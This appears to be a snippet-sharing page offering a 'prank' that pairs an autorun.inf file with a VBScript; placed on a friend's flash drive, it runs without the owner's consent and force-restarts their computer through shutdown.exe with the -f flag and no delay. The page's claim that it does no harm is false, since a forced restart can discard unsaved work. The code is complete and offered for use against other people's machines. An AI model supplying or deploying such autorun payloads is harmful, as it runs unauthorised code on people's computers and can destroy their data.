Little Shutdown Script
4
explode
This is a great little script that you can put on a friend's flash drive. It won't do any harm to their computer...it's just funny to watch. Put these 2 files in the "root" of the flash drive, cd, or any type of media/external drive. When they plug it in it will run the autorun script which then runs the shutdown script and restarts their computer! You will get a few laughs out of it...guaranteed!
[autorun]
shellexecute=Shutdown.vbs
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "%windir%\system32\shutdown.exe -r -f -t 00"






There are currently no comments for this snippet.